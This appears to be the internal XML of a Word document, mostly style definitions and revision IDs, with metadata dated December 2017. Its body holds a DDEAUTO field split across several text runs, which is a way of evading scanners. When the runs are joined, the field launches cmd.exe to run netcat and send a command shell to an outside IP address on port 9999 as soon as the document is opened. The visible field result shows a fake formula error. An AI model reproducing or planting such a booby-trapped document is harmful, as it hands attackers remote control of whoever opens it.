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CF5D18" w:rsidRPr="00DD0D63" w:rsidRDefault="00DC0B47" w:rsidP="00DD0D63"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DD0D63">
        <w:instrText>DDEAUTO C:\\</w:instrText>
      </w:r>
      <w:r w:rsidR="00646A71">
        <w:instrText>Windows\\System32\\cmd</w:instrText>
      </w:r>
      <w:r w:rsidR="008B7623">
        <w:instrText>.exe "/k nc.exe -</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1371">
        <w:instrText xml:space="preserve">nv </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1371" w:rsidRPr="00BA1371">
        <w:instrText>173.24.139.22</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1371">
        <w:instrText xml:space="preserve"> 9999 -e cmd.exe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t>!Unexpected End of Formula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DE693A"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CF5D18" w:rsidRPr="00DD0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122"/>
    <w:rsid w:val="000C5122"/>
    <w:rsid w:val="00145D1E"/>
    <w:rsid w:val="0015046F"/>
    <w:rsid w:val="00163056"/>
    <w:rsid w:val="00280C44"/>
    <w:rsid w:val="00646A71"/>
    <w:rsid w:val="00843A5B"/>
    <w:rsid w:val="00846A2E"/>
    <w:rsid w:val="008B7623"/>
    <w:rsid w:val="00BA1371"/>
    <w:rsid w:val="00CF5D18"/>
    <w:rsid w:val="00DC0B47"/>
    <w:rsid w:val="00DD0D63"/>
    <w:rsid w:val="00DE693A"/>
    <w:rsid w:val="00F042A9"/>
    <w:rsid w:val="00F9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5D18"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-e">
    <w:name w:val="crayon-e"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-s">
    <w:name w:val="crayon-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B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5D18"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-e">
    <w:name w:val="crayon-e"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0B47"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-s">
    <w:name w:val="crayon-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DC0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1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dcterms:created xsi:type="dcterms:W3CDTF">2017-12-27T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-27T03:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>